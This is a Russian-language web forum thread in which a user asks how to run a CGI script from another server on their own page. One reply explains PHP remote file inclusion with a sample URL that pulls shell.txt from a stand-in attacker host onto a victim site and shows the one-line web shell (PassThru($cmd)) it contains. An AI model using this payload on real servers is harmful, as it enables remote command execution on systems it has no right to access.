|
|
|
Supreme Being

участник
Last Login: 16.04.2006 15:28
Сообщ.: 105,
Visits: 1 156
|
|
В общем, вот: есть страница, генерируемая с помощью cgi. Могу ли я на ней выполнить код, который будет находиться на другом сервере (www.ru/cgi-bin/1.cgi)? То есть сделать что-то вроде include. Это можно сделать? Если да, то как?
Сорри за неграмотность, я с cgi еще не работал, просто тут понадобилось выполнить цги-скрипт на странице.
|
|
|
|
|
Supreme Being

участник
Last Login: 13.07.2006 17:05
Сообщ.: 124,
Visits: 1 356
|
|
Не совсем понятно, что конкретно ты хочешь. Вот смотри: У тебя есть www.site.com/index.cgi - вот эта страница генериться скриптом. Например: #!/usr/bin/perl -wT use CGI; use strict; print header(); print <<HTML; <center>Hello!</center> HTML Этот код печатает в броузере Hello! Как понять теперь, что значит выполнить код на другом сервере?
PerlMonks.Org.Ru.... coming soon
|
|
|
|
|
Supreme Being

участник
|
|
Хм.Постараюсь объяснить :) Мне надо на странице запустить скрипт, который показал бы список файлов в этой папке (к примеру). Но сам cgi скритп находиться на другом сервере. Вот я и спрашиваю как бы вставить cgi с другого сервера себе.
|
|
|
|
|
Supreme Being

участник
|
|
Если тебе надо получить листинг директории, то это элементарный скрипт, и я не понимаю зачем использовать скрипт с другого сервера.
|
|
|
|
|
Supreme Being

участник
|
|
Ну млин. Эт я к примеру привел! Нельзя на эту страницу скрипты закачивать! ПОэтому и спрашиваю, как запустить скрипт, который лежит на другом сервере. Есть какая-нить команда типа execute?
|
|
|
|
|
Supreme Being

участник
|
|
Во-первых на страницу скрипты не закачивабтся, а во-вторых если нельзя, то нельзя и исполнить здесь никакой другой скрипт, если тебя интересует возможность хакнуть систему, и для этого ты хочешь получить листинг директории, то твоя идея тупиковая ;-), можно попробовать инклуд, но для этого скрипт на этом сервере должен быть уязвим по этой части, то есть например в пхп инклуд осуществляется примерно так: http://victim.com/index.php?file=http://hackersite.com/shell.txt&cmd=ls -la где файл shell.txt содержит следующий код: <?php PassThru($cmd); ?> Этот файл позволяет выполнять команды на уязвимом сервере 4-)
|
|
|
|
|
Supreme Being

участник
|
|
Не, мне как-то ломать ниче не надо =) Просто хочу свою страницу посмотреть. И вообще, узнать, возможно ли такое. Ведь на всяких там пхп и асп можно ведь выполнять скрипты из других файлов... Вот и спросил. Знач никак? :(
|
|
|
|
|
Supreme Being

участник
Last Login: 30.08.2004 0:26
Сообщ.: 232,
Visits: 2 553
|
|